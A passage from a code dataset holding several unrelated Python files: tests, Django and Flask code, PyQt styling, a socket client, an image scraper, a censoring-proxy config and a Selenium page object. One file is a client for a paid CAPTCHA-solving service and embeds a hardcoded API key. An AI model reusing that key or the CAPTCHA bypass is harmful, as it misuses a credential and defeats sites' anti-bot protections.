PollsTest(unittest.TestCase):\n def setUp(self):\n self.base_url = 'http://127.0.0.1:8000/polls'\n\n def tearDown(self):\n pass\n\n def test_get_poll_index(self):\n '''测试投票系统首页'''\n r = requests.get(self.base_url)\n code = r.status_code\n text = r.text\n self.assertEqual(code, 200)\n\n def test_get_poll_question(self):\n '''获得问题1的所有选项'''\n r = requests.get(self.base_url + '/1/')\n code = r.status_code\n text = r.text\n self.assertEqual(code, 200)\n self.assertIn(\"3\", text)\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"socketlabel/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"400719549","text":"# -*- coding: utf-8 -*-\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Author: Edinson E. Padrón Urdaneta\n# Email: epadron@4geeks.co\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\n# Módulos ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nfrom django.db import models\nfrom errno import EEXIST\nfrom hashlib import sha1\nfrom mintur.settings import MEDIA_ROOT\nfrom os import makedirs\nfrom os import path\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\n# Constantes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nERROR_MSG = (\n 'No hay forma de conseguir el usuario para este modelo.'\n '\\n¿Está seguro que no prefiere usar la clase Model'\n ' en lugar de esta clase para extender su modelo?'\n)\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\n# Clases ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nclass CustomFileAllocatorModel(models.Model):\n class Meta:\n abstract = True\n\n def save(self):\n if u'cedula' in dir(self):\n key_str = self.rif\n\n elif u'pst' in dir(self):\n key_str = self.pst.rif\n\n elif u'declaracion' in dir(self):\n key_str = self.declaracion.pst.rif\n \n else:\n raise Exception(ERROR_MSG)\n\n for field in self._meta.fields:\n if isinstance(field, models.FileField):\n process_file_field(field, key_str)\n\n super(CustomFileAllocatorModel, self).save()\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\n# Funciones ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\ndef create_directory_if_not_exists(relative_path_str):\n complete_path_str = path.join(MEDIA_ROOT, relative_path_str)\n\n if not path.exists(complete_path_str):\n try:\n makedirs(complete_path_str)\n\n except OSError as exception:\n if exception.errno != EEXIST or not path.isdir(path):\n raise exception\n\n\ndef gen_path_str_from_key_str(key_str):\n hash_str = sha1(key_str).hexdigest()\n return path.join(*(hash_str[i:i+4] for i in xrange(0, 40, 4)))\n\n\ndef process_file_field(field, key_str):\n field.upload_to = gen_path_str_from_key_str(key_str)\n create_directory_if_not_exists(field.upload_to)\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n","sub_path":"utils/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"239356619","text":"from flask import Flask, render_template\r\nimport requests\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef index():\r\n names = ['akshay','bhikan','sandeep','tejas']\r\n date = []\r\n for i in names:\r\n url = \"https://7bwcdzfj44.execute-api.us-east-1.amazonaws.com/sanitizerappretrieve?Name=\"+i\r\n resp = requests.get(url)\r\n data = resp.json()\r\n print(data)\r\n #[{'name': 'sandeep', 'date': '31-09-2020'}]\r\n date.append(data['date'])\r\n return render_template('stats.html', p1= names[0],d1=date[0], p2=names[1], d2=date[1],p3=names[2], d3=date[2],p4=names[3], d4=date[3])\r\n#https://sw0sm7rpq5.execute-api.us-east-1.amazonaws.com/sanitizerappinsert?Name=someone&date=someday\r\n# above url is the url to insert data \r\n# https://7bwcdzfj44.execute-api.us-east-1.amazonaws.com/sanitizerappretrieve?Name=someone\r\n# above url is the url which is to retrieve\r\n\r\nif __name__ == '__main__':\r\n app.run(host='0.0.0.0', port=5000, debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"473458091","text":"from PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QProxyStyle\nfrom PyQt5.QtWidgets import QStyle\nfrom PyQt5.QtWidgets import QStyleOption\nfrom PyQt5.QtWidgets import QWidget\nfrom PyQt5.QtWidgets import QStyleOptionTab\nfrom PyQt5.QtGui import QBrush, QTextOption, QPen\nfrom PyQt5.QtCore import QRectF\nfrom PyQt5 import QtCore\nfrom PyQt5 import QtGui\nimport typing\n\n\nclass TabStyle(QProxyStyle):\n\n # override method\n def sizeFromContents(self, content_type: QStyle.ContentsType,\n option: 'QStyleOption', size: QtCore.QSize, widget: QWidget):\n\n size = QProxyStyle.sizeFromContents(content_type, option, size, widget)\n\n if content_type == QStyle.CT_TabBarTab:\n size.transpose()\n size.setHeight(90)\n size.setWidth(44)\n\n return size\n\n def drawControl(self, element: QStyle.ControlElement, option: 'QStyleOption',\n painter: QtGui.QPainter, widget: typing.Optional[QWidget] = ...):\n\n if element == QStyle.CE_TabBarTabLabel:\n tab = QStyleOptionTab(option)\n if tab:\n all_rect = tab.rect\n\n if tab.state and QStyle.State_Selected:\n painter.save()\n painter.setPen(QPen(0x89cfff))\n painter.setBrush(QBrush(0x89cfff))\n painter.drawRect(all_rect.adjusted(6, 6, -6, -6))\n painter.restore()\n\n text_option = QTextOption()\n text_option.setAlignment(Qt.AlignCenter)\n if tab.state and QStyle.State_Selected:\n painter.setPen(QPen(0xf8fcff))\n else:\n painter.setPen(QPen(0x5d5d5d))\n painter.drawText(QRectF(all_rect), tab.text, text_option)\n return\n\n if element == QStyle.CE_TabBarTab:\n QProxyStyle.drawControl(element, option, painter, widget)\n\n\n'''\n void drawControl(ControlElement element, const QStyleOption *option, \n QPainter *painter, const QWidget *widget) const\n {\n if (element == CE_TabBarTabLabel) {\n if (const QStyleOptionTab *tab = qstyleoption_cast(option)) {\n QRect allRect = tab->rect;\n\n if (tab->state & QStyle::State_Selected) {\n painter->save();\n painter->setPen(0x89cfff);\n painter->setBrush(QBrush(0x89cfff));\n painter->drawRect(allRect.adjusted(6, 6, -6, -6));\n painter->restore();\n }\n QTextOption option;\n option.setAlignment(Qt::AlignCenter);\n if (tab->state & QStyle::State_Selected) {\n painter->setPen(0xf8fcff);\n }\n else {\n painter->setPen(0x5d5d5d);\n }\n\n painter->drawText(allRect, tab->text, option);\n return;\n }\n }\n\n if (element == CE_TabBarTab) {\n QProxyStyle::drawControl(element, option, painter, widget);\n }\n }\n};\n'''\n","sub_path":"TabStyle.py","file_name":"TabStyle.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"31863447","text":"\n# add the following variables to test in a particular gcp environment\nworkspaceProjectId = \"\" # a solution workspace project id\ndeploymentProjectId = \"\" # a solution environment project id\nactivator_git_url = \"\" # git url for an external activator\nbase_folder_id = \"\" # tranquility base folder\nteamCloudIdentityGroup = \"\" # valid cloud identity group\nteam_members = [\n {\n \"role\": {\n \"name\": \"admin\",\n \"cloudIdentityGroup\": \"ADD HERE\",\n \"id\": 1,\n \"description\": \"eagle console admin role\"\n },\n \"user\": {\n \"lastName\": \"ADD_HERE\",\n \"email\": \"ADD_HERE\",\n \"id\": 1,\n \"firstName\": \"ADD_HERE\",\n \"isAdmin\": False,\n \"showWelcome\": True\n },\n \"id\": 2\n }\n]\n","sub_path":"src/test/python/tranquilitybase/gcpdac/functional/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"45044150","text":"# needs 2 buttons and an output box.\n\n# when you click a button:\n# - the time is stored\n# - message is sent\n# - message is received\n# - time is stored again\n# - time taken to send and then receive a reply is taken and outputted.\n\n# Take some averages of that result\n\n# 500\n#####################################################\n# 10 #\n# //////////////////// //////////////////// # \n# // // // // #\n# // Button 1 // // Button 2 // #\n# // // // // #\n# //////////////////// //////////////////// # 200\n# 10 10 10 #\n# //////////////////////////////////////////// #\n# // Output Text Box 480x30 // #\n# //////////////////////////////////////////// #\n# 10 #\n#####################################################\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5 import QtCore\nfrom queue import SimpleQueue\n\nimport json\nimport sys\nimport time\nimport socket\nimport threading\nimport time\n\nclass globalData:\n def __init__(self):\n self.ip = ''\n self.port = 0\n\n self.updates = 0\n\n self.forStr = 0\n self.StrOutQ = SimpleQueue()\n\n self.forJson = 0\n self.JsonOutQ = SimpleQueue()\n\n self.startTime = 0\n self.serverTime = 0\n self.endTime = 0\n self.retSize = 0\n self.gotSize = 0\n\n\nclient = 0\ngdata = globalData()\nisRun = True\nisCon = False\ncBGThread = None\n\n\nclass TestClient(QWidget):\n\n def __init__(self):\n super().__init__()\n self.outBox = 0\n self.button1 = 0\n self.button2 = 0\n\n self.initUI()\n\n self.timer = QtCore.QTimer()\n self.timer.timeout.connect(self.timerEvent)\n self.timer.start(100)\n\n def timerEvent(self):\n while gdata.updates is not 0:\n msg = (\"%s-%s, sizes are %s, %s\" % (str(gdata.startTime), str(gdata.endTime), str(gdata.retSize), str(gdata.gotSize)))\n self.outBox.setText(msg)\n gdata.updates -= 1\n\n def doStringTest(self):\n print(\"uh oh\")\n gdata.startTime = round(time.time() % 60, 3)\n gdata.StrOutQ.put(\"Arbitrary Message\")\n gdata.forStr += 1\n\n def doJsonTest(self):\n print(\"uh oh but Json\")\n gdata.startTime = round(time.time() % 60, 3)\n dict = {'msg': \"Arbitrary Message\"}\n gdata.JsonOutQ.put(dict)\n gdata.forJson += 1\n\n def initUI(self):\n\n self.button1 = QPushButton(\"String Test\")\n self.button1.setGeometry(10, 10, 235, 140)\n self.button1.clicked.connect(self.doStringTest)\n self.button1.setParent(self)\n self.button1.show()\n\n self.button2 = QPushButton(\"Json Test\")\n self.button2.setGeometry(255, 10, 235, 140)\n self.button2.clicked.connect(self.doJsonTest)\n self.button2.setParent(self)\n self.button2.show()\n\n self.outBox = QLineEdit(self)\n self.outBox.setGeometry(10, 160, 480, 30)\n self.outBox.setReadOnly(True)\n\n self.setGeometry(300, 300, 500, 200)\n self.setWindowTitle(\"Test Client\")\n self.show()\n\n def closeEvent(self, event):\n global isRun\n global isCon\n isRun = False\n isCon = False\n\n\ndef recFuncStr(socket):\n global isCon\n global gdata\n while isCon:\n while gdata.forStr is not 0:\n try:\n size = socket.recv(2)\n intSize = int.from_bytes(size, byteorder='big')\n data = socket.recv(intSize)\n\n myData = data.decode('utf-8').split(' ')\n\n # store all the data ready for displaying\n gdata.serverTime = myData[0] # problems with server time not matching up means we ignore this now\n gdata.retSize = myData[1]\n gdata.endTime = round(time.time() % 60, 3)\n gdata.gotSize = intSize\n\n # tell which loops have a request waiting on them / completed request\n gdata.updates += 1\n gdata.forStr -= 1\n\n except Exception as e:\n print(\"Error: \" + str(e))\n isCon = False\n\n\ndef recFuncJson(socket):\n global isCon\n global gdata\n while isCon:\n while gdata.forJson is not 0:\n try:\n size = socket.recv(2)\n intSize = int.from_bytes(size, byteorder='big')\n data = socket.recv(intSize)\n\n obj = json.loads(data.decode('utf-8'))\n gdata.retSize = obj['size']\n gdata.serverTime = obj['time']\n gdata.endTime = round(time.time() % 60, 3)\n gdata.gotSize = intSize\n\n gdata.updates += 1\n gdata.forJson -= 1\n\n except Exception as e:\n print(\"Error: \" + str(e))\n isCon = False\n\n\ndef senFuncStr(socket):\n global isCon\n global gdata\n while isCon:\n while not gdata.StrOutQ.empty():\n try:\n msgdict = gdata.StrOutQ.get()\n msgencode = msgdict.encode()\n msglen = len(msgencode)\n\n socket.send(msglen.to_bytes(2, byteorder='big'))\n socket.send(msgencode)\n\n except Exception as e:\n print(\"Error: \" + str(e))\n isCon = False\n\n\ndef senFuncJson(socket):\n global isCon\n global gdata\n while isCon:\n while not gdata.JsonOutQ.empty():\n try:\n msgdict = gdata.JsonOutQ.get()\n msgencode = json.dumps(msgdict).encode()\n msglen = len(msgencode)\n\n socket.send(msglen.to_bytes(2, byteorder='big'))\n socket.send(msgencode)\n\n except Exception as e:\n print(\"Error: \" + str(e))\n isCon = False\n\n\ndef BGThread():\n mySock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n global isRun\n global isCon\n while isRun:\n while not isCon:\n try:\n mySock.connect((gdata.ip, gdata.port))\n isCon = True\n recThreadJson = threading.Thread(target=recFuncJson, args=(mySock,))\n recThreadJson.start()\n senThreadJson = threading.Thread(target=senFuncJson, args=(mySock,))\n senThreadJson.start()\n\n recThreadStr = threading.Thread(target=recFuncStr, args=(mySock,))\n recThreadStr.start()\n senThreadStr = threading.Thread(target=senFuncStr, args=(mySock,))\n senThreadStr.start()\n except Exception as e:\n print(\"ERROR: \" + str(e))\n time.sleep(1)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv) # needed???? idk\n client = TestClient()\n\n gdata.ip = 'localhost'\n gdata.port = 9000\n\n cBGThread = threading.Thread(target=BGThread, args=())\n cBGThread.start()\n\n sys.exit(app.exec_())\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Poster & such/testClient.py","file_name":"testClient.py","file_ext":"py","file_size_in_byte":7157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"101617619","text":"#coding:utf-8 \nimport re\nimport urllib.request\nimport os\nos.chdir(\"D:/学习/Python/MyCodes/20180801爬取图片/tu/\")\n\n# ------ 获取网页源代码的方法 ---\ndef getHtml(url):\n page = urllib.request.urlopen(url)\n html = page.read()\n return html\n\n# ------ 获取帖子内所有图片地址的方法 ------\ndef getImg(html):\n # ------ 利用正则表达式匹配网页内容找到图片地址 ------\n reg = r'src=\"([.*\\S]*\\.jpg)\"' #在这个网页取到的都是缩略图,这个网站的规律是缩略图的名称有“rn”,原图没有\n imgre = re.compile(reg);\n imglist = re.findall(imgre, html)\n return imglist\n\n\nMyUrls = []\nMyUrls1 = [\"http://www.umei.cc/bizhitupian/meinvbizhi/%s.htm\" % i for i in list(range(1,2))]\nMyUrls += MyUrls1\n#MyUrls2 = [\"http://www.umei.cc/bizhitupian/weimeibizhi/%s.htm\" % i for i in list(range(2,7))]\n#MyUrls += MyUrls2\n#说明:把下面##替换为你想爬的网址,备注:该网址需要是分多页显示图片的,可以把range中的“7”替换为你想爬多少页,当然,前提是网站里真的有这么多页\n#MyUrls3 = [\"##%s.htm\" % i for i in list(range(2,7))]\n#MyUrls += MyUrls3\n\n \nimgName = 0\nfor url in MyUrls:\n html = getHtml(url)\n html = html.decode('UTF-8') \n imgList = getImg(html)\n for imgPath in imgList:\n # ------ 这里最好使用异常处理及多线程编程方式 ------\n #print('原来是:',imgPath)\n if 'rn' in imgPath: \n imgPath_Original = imgPath.replace('rn','')\n #print('变成了:',imgPath_Original) \n else:\n imgPath_Original = imgPath\n \n try:\n# f = open('D:\\\\tu\\\\'+ str(imgName)+\".jpg\", 'wb')\n f = open(str(imgName)+\".jpg\", 'wb')\n f.write((urllib.request.urlopen(imgPath_Original)).read())\n print(imgPath_Original)\n f.close()\n except Exception as e:\n print(imgPath_Original+\" error\")\n imgName += 1\n\nprint(\"All Done!!!\")\n","sub_path":"get_tp_ok2.0.py","file_name":"get_tp_ok2.0.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"473210373","text":"from os.path import exists\n\nimport logging\nfrom requests import post, get\nfrom time import sleep\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n\nclass SolveCaptcha:\n def __init__(self, wait_time=5):\n self.settings = {\"url_request\": \"http://2captcha.com/in.php\",\n \"url_response\": \"http://2captcha.com/res.php\",\n \"key\": 'e99ba665b8175648b7c06e5243107f2c'}\n self.waittime = wait_time\n\n def get_balance(self):\n \"\"\"\n This request need for get balance\n :return: OK | 1 ERROR!\n \"\"\"\n fullurl = \"%s?action=getbalance&key=%s\" % (\n self.settings['url_response'], self.settings['key'])\n request = get(fullurl)\n if \".\" in request.text:\n logger.info(\"Balance: %s\" % request.text)\n return request.text\n\n elif request.text == \"ERROR_KEY_DOES_NOT_EXIST\":\n logger.error(\"You used the wrong key in the query\")\n return\n\n elif request.text == \"ERROR_WRONG_ID_FORMAT\":\n logger.error(\"Wrong format ID CAPTCHA. ID must contain only numbers\")\n return\n\n def get_result(self, captcha_id):\n \"\"\"\n This function return the captcha solved\n :param captcha_id: id captcha returned by upload\n :return: OK | 1 ERROR!\n \"\"\"\n logger.info(\"Wait %s second..\" % self.waittime)\n sleep(self.waittime)\n fullurl = \"%s?key=%s&action=get&id=%s\" % (self.settings['url_response'],\n self.settings['key'], captcha_id)\n logger.info(\"Get Captcha solved with id %s\" % captcha_id)\n request = get(fullurl)\n if request.text.split('|')[0] == \"OK\":\n return request.text.split('|')[1]\n elif request.text == \"CAPCHA_NOT_READY\":\n logger.error(\"CAPTCHA is being solved, repeat the request several seconds later, \"\n \"wait another %s seconds\" % self.waittime)\n return self.get_result(captcha_id)\n\n elif request.text == \"ERROR_KEY_DOES_NOT_EXIST\":\n logger.error(\"You used the wrong key in the query\")\n return\n\n elif request.text == \"ERROR_WRONG_ID_FORMAT\":\n logger.error(\"Wrong format ID CAPTCHA. ID must contain only numbers\")\n return\n\n elif request.text == \"ERROR_CAPTCHA_UNSOLVABLE\":\n logger.error(\"Captcha could not solve three different employee\")\n return\n\n def solve(self, path_file):\n \"\"\"\n This function upload read, upload and is the wrapper for solve\n the captcha\n :param path_file: path of image\n :return: OK | 1 ERROR!\n \"\"\"\n if exists(path_file):\n files = {'file': open(path_file, 'rb')}\n payload = {'key': self.settings['key'], 'method': 'post'}\n logger.info(\"Uploading to 2Captcha.com..\")\n request = post(self.settings['url_request'], files=files,\n data=payload)\n if request.ok:\n if request.text.split('|')[0] == \"OK\":\n logger.info(\"Upload Ok\")\n return self.get_result(request.text.split('|')[1])\n\n elif request.text == \"ERROR_WRONG_USER_KEY\":\n logger.error(\"Wrong 'key' parameter format, it should contain 32 symbols\")\n return\n elif request.text == \"ERROR_KEY_DOES_NOT_EXIST\":\n logger.error(\"The 'key' doesn't exist\")\n return\n elif request.text == \"ERROR_ZERO_BALANCE\":\n logger.error(\"You don't have money on your account\")\n return\n elif request.text == \"ERROR_NO_SLOT_AVAILABLE\":\n logger.error(\"The current bid is higher than the maximum bid set for your account.\")\n return\n elif request.text == \"ERROR_ZERO_CAPTCHA_FILESIZE\":\n logger.error(\"CAPTCHA size is less than 100 bites\")\n return\n elif request.text == \"ERROR_TOO_BIG_CAPTCHA_FILESIZE\":\n logger.error(\"CAPTCHA size is more than 100 Kbites\")\n return\n elif request.text == \"ERROR_WRONG_FILE_EXTENSION\":\n logger.error(\"The CAPTCHA has a wrong extension. \"\n \"Possible extensions are: jpg,jpeg,gif,png\")\n return\n elif request.text == \"ERROR_IMAGE_TYPE_NOT_SUPPORTED\":\n logger.error(\"The server cannot recognize the CAPTCHA file type.\")\n return\n elif request.text == \"ERROR_IP_NOT_ALLOWED\":\n logger.error(\"The request has sent from the IP that is not on the list of \"\n \"your IPs. Check the list of your IPs in the system.\")\n return\n elif request.text == \"IP_BANNED\":\n logger.error(\"The IP address you're trying to access our server with is banned \"\n \"due to many frequent attempts to access the server using wrong authorization keys. \"\n \"To lift the ban, please, contact our support team via email: support@2captcha.com\")\n return\n else:\n logger.error(\"File %s not exists\" % path_file)\n return\n\n\nif __name__ == '__main__':\n captcha = SolveCaptcha()\n print(captcha.solve('images/captcha_original.png'))\n","sub_path":"test_task/captcha_resolve.py","file_name":"captcha_resolve.py","file_ext":"py","file_size_in_byte":5637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"495141770","text":"import tkinter as tk\nfrom player import Player\n\nclass Screen(tk.Canvas):\n\n def __init__(self, master):\n\n tk.Canvas.__init__(self,master=master)\n\n master.update()\n self['width'] = self.width = master.winfo_screenwidth() \n self['height'] = self.height = master.winfo_screenheight()\n self['bg'] = \"white\"\n\n self.focus_get()\n\n self.pack_propagate(0)\n self.pack()\n\n self.player = Player(self)\n self.player.show()\n\n self.generate()\n\n def getSpeed(self):\n return 3\n \n def generate(self):\n cx,cy = self.width / 2,self.height / 2\n self.img = tk.PhotoImage(file='.\\\\res\\\\textures\\\\tiles\\\\tile_0.png').zoom(10)\n size = self.img.width()\n self.create_image(cx - size / 2,cy - size / 2,image=self.img)\n","sub_path":"screen.py","file_name":"screen.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"37122211","text":"\"\"\"\nLessons for learning data types in Python\n\"\"\"\n\n\n# Lists\nbanks = [\"charles schwab\", \"capital one\", \"american express\"]\n\n# Dict\nbanks = [\n {\"name\": \"charles schwab\"},\n {\"name\": \"capital one\"},\n {\"name\": \"american express\"},\n]\n\n# Tuples\ncash_accounts = (\"checking\", \"savings\")\ninvestment_accounts = (\"stock\", \"bond\", \"mutual_fund\")\ncredit_accounts = (\"credit_card\", \"student_loan\", \"mortgage\")\nprint(\"The largest credit account is\", max(credit_accounts), \"\\n\")\n\n#------------------------------------------------------------------\n\n# List iteration\nfor bank in banks:\n print(bank)\n\n# Dict deconstruction\nbank_names = [bank[\"name\"] for bank in banks]\nprint(bank_names)\n","sub_path":"day1/2-data_types.py","file_name":"2-data_types.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"622245398","text":"import sys\nimport multiprocessing as mp\n\nfrom pyqtgraph.Qt import QtGui, QtCore\nfrom .widgets import DistWidget\n\nimport numpy as np\n\n\nclass DataThread(QtCore.QThread):\n def __init__(self, q, data):\n super().__init__()\n self.q = q\n self.data = data\n\n def run(self):\n for idx, a0dist, adist in iter(self.q.get, None):\n self.data[idx, :, 0] = a0dist\n self.data[idx, :, 1:] = adist.T\n\n\ndef process_target(q, nepisodes, alabels, olabels):\n na = len(alabels)\n no = len(olabels)\n\n olabels = ('*',) + olabels\n\n shape = nepisodes, na, no + 1\n data = np.full(shape, np.nan)\n\n app = QtGui.QApplication([])\n gui = DistWidget().setup(data, alabels, olabels)\n gui.show()\n\n timer = QtCore.QTimer()\n timer.timeout.connect(gui.update)\n timer.start(1000)\n\n def endtimer():\n timer.stop()\n gui.update()\n\n t = DataThread(q, data)\n t.finished.connect(endtimer)\n t.start()\n\n sys.exit(app.exec_())\n\n\nclass Reactive_Plotter:\n def __init__(self, reactive, nepisodes):\n self.reactive = reactive\n\n alabels = tuple(reactive.aspace.values)\n olabels = tuple(reactive.ospace.values)\n\n self.q = mp.Queue()\n args = self.q, nepisodes, alabels, olabels\n self.p = mp.Process(target=process_target, args=args)\n self.p.daemon = True\n self.p.start()\n\n self.idx = 0\n\n def update(self, params):\n a0probs = self.reactive.a0model.probs(params[0], ())\n aprobs = self.reactive.amodel.probs(params[1], ())\n\n self.q.put((self.idx, a0probs, aprobs))\n self.idx += 1\n\n def close(self):\n self.q.put(None)\n","sub_path":"src/rl/graph/reactive_plotter.py","file_name":"reactive_plotter.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"508082883","text":"\nimport json\nimport socket\n\ndef make_listen_sock(host, port):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.bind((host, port))\n sock.listen(100) \n return sock\n\ndef get_json(player_socket):\n msg = player_socket.recv(1028).decode()\n \n if msg:\n return json.loads(msg)\n else:\n return None\n\ndef send_json(player_socket, json_):\n s = json.dumps(json_)\n player_socket.sendall(s.encode())\n\n","sub_path":"plumbing/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"308050452","text":"config = {\n # If enabled, only parts that are identified will be visible, and the rest of the image\n # will be blurred. This still takes `blocked_labels` into consideration, and parts matching\n # those labels will be visible.\n \"invert\": True,\n\n # Labels included in this list will be censored. Or, if `invert` is set to true, only these\n # labels will be visible in an image, and the rest will be blurred. Available labels can be\n # found in NudeNet's documentation: https://github.com/notAI-tech/NudeNet\n \"blocked_labels\": [\n # \"EXPOSED_ANUS\",\n # \"EXPOSED_ARMPITS\",\n \"COVERED_BELLY\",\n # \"EXPOSED_BELLY\",\n # \"COVERED_BUTTOCKS\",\n # \"EXPOSED_BUTTOCKS\",\n \"FACE_F\",\n # \"FACE_M\",\n \"COVERED_FEET\",\n \"EXPOSED_FEET\",\n # \"COVERED_BREAST_F\",\n # \"EXPOSED_BREAST_F\",\n # \"COVERED_GENITALIA_F\",\n # \"EXPOSED_GENITALIA_F\",\n # \"EXPOSED_BREAST_M\",\n # \"EXPOSED_GENITALIA_M\"\n ],\n\n # The directory that cached image files should be stored in\n \"cache_dir\": \"cache\",\n\n # The minimum content size for an image to be considered for censorship.\n # This filters out small images like icons, thumbnails, etc.\n \"min_content_size\": 10000,\n\n # The proxy will only pay attention to responses with a Content-Type included in the list below.\n # This allows you to filter out non-image types, or types of images that aren't relevant (e.g. SVGs).\n \"image_content_types\": [\n \"image/jpeg\",\n \"image/png\",\n \"image/webp\"\n ],\n\n # This is a mapping of the above content types to their relevant extensions. Eventually\n # this could probably be automated.\n \"image_extensions\": {\n \"image/jpeg\": \".jpg\",\n \"image/png\": \".png\",\n \"image/webp\": \".webp\"\n },\n\n # This is a mapping of the above content types to their relevant pillow/PIL types. When\n # we call image.save() we pass it one of these values. Eventually this could probably be\n # automated.\n \"image_pil_types\": {\n \"image/jpeg\": \"JPEG\",\n \"image/png\": \"PNG\",\n \"image/webp\": \"WEBP\"\n }\n}","sub_path":"scripts/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"273562786","text":"from pageobject.订单管理.page_订单管理页 import OrderPage\nfrom pagelocators.订单管理.page_loc_创建订单页 import OrderCreatePageLoc as loc\nfrom common.handle_logger import logger\n\n\nclass OrderCreatePage(OrderPage):\n \"\"\"创建订单页面\"\"\"\n\n # 选择采购类别\n def select_kind(self, kind):\n logger.info(\"--- 选择采购类别:{} ---\".format(kind))\n # 获取所有采购类别的名字\n kinds = self.find_elements(loc.kind_loc)\n try:\n # 判断想选择的采购类别是否在列表中,存在时点击选择\n for i in kinds:\n if i.text == kind:\n i.click()\n break\n except:\n logger.exception(\"--- 错误信息:选择的采购类别不存在 ---\")\n\n # 选择生产企业\n def select_manu(self, manu_name):\n logger.info(\"--- 选择生产企业:{} ---\".format(manu_name))\n # 点击生产企业选择框\n self.find_element(loc.manu_loc).click()\n # 获取所有生产企业的名字\n names = self.find_elements(loc.manu_name_loc)\n try:\n # 判断想选择的生产企业是否在列表中,存在时点击选择\n for i in names:\n if i.text == manu_name:\n i.click()\n break\n\n logger.info(\"--- 选择生产企业后,点击确定 ---\")\n # 选择生产企业后点击确定\n self.find_element(loc.manu_yes_loc).click()\n try:\n # 判断是否有错误信息提示框\n self.wait_ele_visible(loc.manu_msg_loc, visible=None)\n except:\n logger.exception(\"--- 提示信息:请选择生产企业 ---\")\n raise\n else:\n logger.info(\"--- 选择生产企业成功 ---\")\n except:\n logger.exception(\"--- 错误信息:选择的生产企业不存在 ---\")\n\n # 输入详细地址\n def input_address(self, address=None):\n # 判断详细地址输入框是否为空,为空时输入信息\n if self.find_element(loc.address_loc).get_attribute(\"value\"):\n pass\n else:\n logger.info(\"--- 输入详细地址:{} ---\".format(address))\n self.find_element(loc.address_loc).send_keys(address)\n\n # 选择料型\n def select_product(self):\n # 选择料型-板料-冲子料\n logger.info(\"--- 选择料型 ---\")\n self.find_element(loc.product_loc).click()\n logger.info(\"--- 选择板料 ---\")\n self.find_element(loc.product_name_loc).click()\n logger.info(\"--- 选择一级 ---\")\n self.find_element(loc.product_name1_loc).click()\n\n # 输入规格\n def input_size(self, size):\n logger.info(\"--- 输入规格:{} ---\".format(size))\n self.find_element(loc.size_loc).send_keys(size)\n\n # 输入销售单价\n def input_sale_unit_price(self, sale_unit_price):\n logger.info(\"--- 输入销售单价:{} ---\".format(sale_unit_price))\n self.find_element(loc.sale_unit_price_loc).send_keys(sale_unit_price)\n\n # 输入采购单价\n def input_purchase_unit_price(self, purchase_unit_price):\n logger.info(\"--- 输入采购单价:{} 